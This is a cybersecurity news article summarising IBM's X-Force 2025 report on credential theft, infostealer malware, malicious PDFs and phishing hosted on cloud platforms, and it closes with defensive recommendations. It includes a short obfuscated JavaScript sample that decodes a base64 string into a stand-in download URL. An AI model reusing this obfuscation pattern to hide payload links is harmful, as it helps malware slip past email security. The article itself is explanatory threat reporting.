IBM’s X-Force 2025 Threat Intelligence Index has revealed a troubling trend: nearly one-third of all cyber attacks are now using highly sophisticated methods to steal login credentials instead of relying on brute-force hacking techniques.
According to the report, 30% of incident response cases involved attackers using valid account credentials to gain access. This method is now tied with the exploitation of public-facing applications as the most common way for hackers to breach systems.
This shift shows how cybercriminals are adapting. They now prefer credential theft over malware deployment because it allows them to “log in” instead of “break in.” This strategy often bypasses security systems and makes detection much harder.
Credential Theft on the Rise
Credential harvesting was the most common impact for victims, accounting for 28% of incidents. Once hackers steal usernames and passwords, they can move through networks undetected.
The report also shows that the Asia-Pacific region has seen a 13% rise in cyber attacks. This area now accounts for 34% of global incidents, largely because of its key role in supply chains and technology manufacturing.
Phishing and Infostealers Surge
IBM analysts noted a significant 84% year-over-year increase in phishing emails delivering infostealers — malware designed to silently collect sensitive information.
“Throughout 2024, we recorded a significant increase in volume, especially in the second half of the year,” IBM’s X-Force team stated.
Attackers used new methods like “attachment hijacking,” where stolen invoice emails are modified and sent out again with malware like Strela Stealer attached.
Dark Web Markets Fuel Malware Growth
The report identified a 12% increase in infostealer advertisements on dark web forums. Popular malware families include:
- Lumma
- RisePro
- Vidar
- Stealc
- RedLine
These infostealers quietly collect keystrokes, capture screenshots, extract stored passwords, and steal financial data—often without alerting users.
Malicious PDFs and Obfuscation
IBM also highlighted a move away from traditional malware attachments to more deceptive methods. PDF files have become the most common malicious attachments.
Many of these PDFs use techniques like obfuscation to hide their true intent:
- 42% contained obfuscated URLs
- 28% hid URLs in PDF streams
- 7% were sent as encrypted files with a password
A sample obfuscated JavaScript code might look like this:
var _0x4a7b=['charCodeAt','toString','fromCharCode','replace','substr'];
(function(_0x382263,_0x4a7b3c){var _0x34b1c4=function(_0x3db7d0){while(--_0x3db7d0){_0x382263['push'](_0x382263['shift']());}};_0x34b1c4(++_0x4a7b3c);}(_0x4a7b,0x176));
var decodeURL = function(){
return atob("aHR0cHM6Ly9tYWxpY2lvdXMuZXhhbXBsZS5jb20vZG93bmxvYWQucGhwP2lkPTEyMzQ=");
}
Such scripts only reveal the malicious payload at runtime, making them difficult for email security systems to detect.
Cloud Platforms Misused for Phishing
Hackers have increasingly used legitimate cloud hosting platforms to launch phishing attacks. These services give attackers access to trusted domains and IPs, helping them avoid detection.
Frequently abused platforms include:
- secureserver.net
- publiccloud.com.br
- Microsoft Azure Blob Storage
These services have been used to spread banking trojans and credential phishing pages at scale.
IBM’s Security Recommendations
To reduce the risk of credential-based attacks, IBM urges organizations to take the following steps:
- Implement multi-factor authentication (MFA) using strong authentication factors
- Monitor login patterns and flag suspicious behavior
- Deploy advanced threat detection tools that can spot credential theft tactics
- Train employees to recognize phishing and social engineering attempts
This latest report serves as a wake-up call for businesses to prioritize identity protection and remain alert to increasingly sophisticated threats that rely less on brute force—and more on stealth.
